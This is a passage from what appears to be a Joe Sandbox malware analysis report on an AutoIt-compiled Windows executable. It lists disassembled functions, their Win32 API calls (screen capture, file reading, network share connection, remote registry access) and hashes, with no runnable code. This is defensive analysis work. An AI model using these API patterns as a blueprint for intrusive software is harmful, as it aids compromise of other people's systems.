                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$Info
                                              • String ID:
                                              • API String ID: 2577412497-0
                                              • Opcode ID: ddcaf1cf5ce3062ab4695065f6c95c1c83b374d2dd5ebd8bf15257bf9626b15c
                                              • Instruction ID: 6db2ca095b6768acc542fa88487ca5a28ad0943e043decabe727b121577d9007
                                              • Opcode Fuzzy Hash: ddcaf1cf5ce3062ab4695065f6c95c1c83b374d2dd5ebd8bf15257bf9626b15c
                                              • Instruction Fuzzy Hash: 6131F4B1D4831A6ADF209FB68C89D6FBFE8FF04750F50456AA50DE7280DA786540CF91
                                              Function 00BDA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BDA259
                                              • DestroyWindow.USER32(?,?), ref: 00BDA2D3
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BDA34D
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BDA36F
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA382
                                              • DestroyWindow.USER32(00000000), ref: 00BDA3A4
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B50000,00000000), ref: 00BDA3DB
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA3F4
                                              • GetDesktopWindow.USER32 ref: 00BDA40D
                                              • GetWindowRect.USER32(00000000), ref: 00BDA414
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BDA42C
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BDA444
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 1297703922-3619404913
                                              • Opcode ID: 891c7466b156d5dee7b78dfd46489d34dfb5cf5a3de6ebd7643af8cc640422d5
                                              • Instruction ID: 1d9a22c4184d89284d63ee358727484512a5e7cd9c47efdd0b653584138e15dc
                                              • Opcode Fuzzy Hash: 891c7466b156d5dee7b78dfd46489d34dfb5cf5a3de6ebd7643af8cc640422d5
                                              • Instruction Fuzzy Hash: AB719070144206AFD725CF18CC59FAAB7E9FB89300F04456EF985873A1EBB4E906CB52
                                              Function 00BD4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00BD4424
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD446F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 3974292440-4258414348
                                              • Opcode ID: d27c8dbc740b937caa6d39d70f7493cb8ef5deaac2fe89c024d4dab420cd504d
                                              • Instruction ID: 49448f248c2aadb034b4836a6324bff21b9bc9610f99dbe560281e6a3b4c5dcd
                                              • Opcode Fuzzy Hash: d27c8dbc740b937caa6d39d70f7493cb8ef5deaac2fe89c024d4dab420cd504d
                                              • Instruction Fuzzy Hash: F5915D746047019FCB04EF10C852A6EB7E1EF95754F0488EAF8965B3A2DB30ED49CB81
                                              Function 00BDB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BDB8B4
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BD91C2), ref: 00BDB910
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BDB949
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BDB98C
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BDB9C3
                                              • FreeLibrary.KERNEL32(?), ref: 00BDB9CF
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BDB9DF
                                              • DestroyCursor.USER32(?), ref: 00BDB9EE
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BDBA0B
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BDBA17
                                                • Part of subcall function 00B72EFD: __wcsicmp_l.LIBCMT ref: 00B72F86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 3907162815-1154884017
                                              • Opcode ID: 3f8a58bba4c87d562627194a13f69d392e08cc290a3a76527006714ab2d24531
                                              • Instruction ID: df61ef2f7aee538b5d68982084b2f1be7b8057792ae7e829c82956c8e67315df
                                              • Opcode Fuzzy Hash: 3f8a58bba4c87d562627194a13f69d392e08cc290a3a76527006714ab2d24531
                                              • Instruction Fuzzy Hash: DF61DF71900219FAEB14DF64CC51FBEBBE8EB08721F108596F915D62C1EB749A80DBA0
                                              Function 00BBA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • CharLowerBuffW.USER32(?,?), ref: 00BBA3CB
                                              • GetDriveTypeW.KERNEL32 ref: 00BBA418
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA460
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA497
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA4C5
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 2698844021-4113822522
                                              • Opcode ID: bc24af055324f000a6e43a40705d29db8918df427b8ef2a1550400b27eec206d
                                              • Instruction ID: 47cadb547917e516cbcea960a0b7b7f6b61ea9cc3ce15bdd23ae4cbcb82cbe99
                                              • Opcode Fuzzy Hash: bc24af055324f000a6e43a40705d29db8918df427b8ef2a1550400b27eec206d
                                              • Instruction Fuzzy Hash: B2516E716087059FC700EF10C89196AB7F8FF98759F1088ADF89A572A1DB71ED0ACB52
                                              Function 00BAF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00B8E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00BAF8DF
                                              • LoadStringW.USER32(00000000,?,00B8E029,00000001), ref: 00BAF8E8
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • GetModuleHandleW.KERNEL32(00000000,00C15310,?,00000FFF,?,?,00B8E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00BAF90A
                                              • LoadStringW.USER32(00000000,?,00B8E029,00000001), ref: 00BAF90D
                                              • __swprintf.LIBCMT ref: 00BAF95D
                                              • __swprintf.LIBCMT ref: 00BAF96E
                                              • _wprintf.LIBCMT ref: 00BAFA17
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BAFA2E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 984253442-2268648507
                                              • Opcode ID: 0aee8aa983fe2a629f4b537555549b7239fb1a68b0d3f5dfbaba6f63c79c3545
                                              • Instruction ID: f327d0e2149f940294675f37ced9e3ad1fd5ac28b1bceea016ff6445651bc14f
                                              • Opcode Fuzzy Hash: 0aee8aa983fe2a629f4b537555549b7239fb1a68b0d3f5dfbaba6f63c79c3545
                                              • Instruction Fuzzy Hash: BB413D72944209AACB15EBE0DD96EFEB7B8EF19301F1040E5B905760A2EE355F0DCA61
                                              Function 00BDBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BD9207,?,?), ref: 00BDBA56
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA6D
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA78
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA85
                                              • GlobalLock.KERNEL32(00000000), ref: 00BDBA8E
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA9D
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00BDBAA6
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBAAD
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BDBABE
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BE2CAC,?), ref: 00BDBAD7
                                              • GlobalFree.KERNEL32(00000000), ref: 00BDBAE7
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00BDBB0B
                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00BDBB36
                                              • DeleteObject.GDI32(00000000), ref: 00BDBB5E
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BDBB74
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: 1245a71c53b07b65e93383239f715b4b974795b4b0fb00406c41bd8764cfaa9e
                                              • Instruction ID: c95c6f259702a9c0d6a156a3dc81a32e1da601c4369a7723254f8e9b69e49a66
                                              • Opcode Fuzzy Hash: 1245a71c53b07b65e93383239f715b4b974795b4b0fb00406c41bd8764cfaa9e
                                              • Instruction Fuzzy Hash: 65412975601205EFDB119F65DC98EBABBF9EF89711F1140AAF906D7260EB309A01CB60
                                              Function 00BBD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                              Download Yara Rule
                                              APIs
                                              • __wsplitpath.LIBCMT ref: 00BBDA10
                                              • _wcscat.LIBCMT ref: 00BBDA28
                                              • _wcscat.LIBCMT ref: 00BBDA3A
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BBDA4F
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDA63
                                              • GetFileAttributesW.KERNEL32(?), ref: 00BBDA7B
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00BBDA95
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDAA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                              • String ID: *.*
                                              • API String ID: 34673085-438819550
                                              • Opcode ID: d3e6562ae35c0095c1a25761320a0b6c172f740d9e905eec6a38102301fac872
                                              • Instruction ID: cf91af45a1a93d5a68b0d444675c385baacad6c09f35e5315669da57870180a6
                                              • Opcode Fuzzy Hash: d3e6562ae35c0095c1a25761320a0b6c172f740d9e905eec6a38102301fac872
                                              • Instruction Fuzzy Hash: CA8191716042419FCB24DF64C884ABAB7E4EF89350F1888AEF8C9C7251F7B8D945CB52
                                              Function 00BC731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00BC738F
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BC739B
                                              • CreateCompatibleDC.GDI32(?), ref: 00BC73A7
                                              • SelectObject.GDI32(00000000,?), ref: 00BC73B4
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BC7408
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00BC7444
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BC7468
                                              • SelectObject.GDI32(00000006,?), ref: 00BC7470
                                              • DeleteObject.GDI32(?), ref: 00BC7479
                                              • DeleteDC.GDI32(00000006), ref: 00BC7480
                                              • ReleaseDC.USER32(00000000,?), ref: 00BC748B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: 9b6a6a186eb699cce09e5183bc817abcc938fd8b2b7404d3d6cea50b86238e6f
                                              • Instruction ID: 46845caf4d0fa697a80cafa5e186053ac74eaa7de45898e7778f28715931d982
                                              • Opcode Fuzzy Hash: 9b6a6a186eb699cce09e5183bc817abcc938fd8b2b7404d3d6cea50b86238e6f
                                              • Instruction Fuzzy Hash: BF513875904209EFCB14CFA8CC85EAEBBF9EF88310F14846EF95A97210DB31A941CB50
                                              Function 00B56A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B70957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B56B0C,?,00008000), ref: 00B70973
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B56BAD
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B56CFA
                                                • Part of subcall function 00B5586D: _wcscpy.LIBCMT ref: 00B558A5
                                                • Part of subcall function 00B7363D: _iswctype.LIBCMT ref: 00B73645
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-1018226102
                                              • Opcode ID: c029238e0cd11a7596859cf4daf24396cebab44d74809c335dce9de8994d25d2
                                              • Instruction ID: 48f2924056980deb8df32274284c739893681a648450438c65d1ecccc2c1434a
                                              • Opcode Fuzzy Hash: c029238e0cd11a7596859cf4daf24396cebab44d74809c335dce9de8994d25d2
                                              • Instruction Fuzzy Hash: A002BC301083419FC724EF24C891AAFBBF5EF99315F5048ADF89A972A1DB30D949CB52
                                              Function 00BB2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2D50
                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00BB2DDD
                                              • GetMenuItemCount.USER32(00C15890), ref: 00BB2E66
                                              • DeleteMenu.USER32(00C15890,00000005,00000000,000000F5,?,?), ref: 00BB2EF6
                                              • DeleteMenu.USER32(00C15890,00000004,00000000), ref: 00BB2EFE
                                              • DeleteMenu.USER32(00C15890,00000006,00000000), ref: 00BB2F06
                                              • DeleteMenu.USER32(00C15890,00000003,00000000), ref: 00BB2F0E
                                              • GetMenuItemCount.USER32(00C15890), ref: 00BB2F16
                                              • SetMenuItemInfoW.USER32(00C15890,00000004,00000000,00000030), ref: 00BB2F4C
                                              • GetCursorPos.USER32(?), ref: 00BB2F56
                                              • SetForegroundWindow.USER32(00000000), ref: 00BB2F5F
                                              • TrackPopupMenuEx.USER32(00C15890,00000000,?,00000000,00000000,00000000), ref: 00BB2F72
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BB2F7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 3993528054-0
                                              • Opcode ID: b4bf8cbb3901e52f328926ecdd00d1373943c0eb89c3e472cf72a14df6d951c6
                                              • Instruction ID: f7cee4a5ac52c16bafa013b61ead7d4ba39a09e9ab43f47a0d457dbb64ce4044
                                              • Opcode Fuzzy Hash: b4bf8cbb3901e52f328926ecdd00d1373943c0eb89c3e472cf72a14df6d951c6
                                              • Instruction Fuzzy Hash: 1A71B270605206BFEB218F55DC85FFABFA4FB04764F1442A6F615AA1E1C7F19820DB90
                                              Function 00BA77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • _memset.LIBCMT ref: 00BA786B
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00BA78A0
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00BA78BC
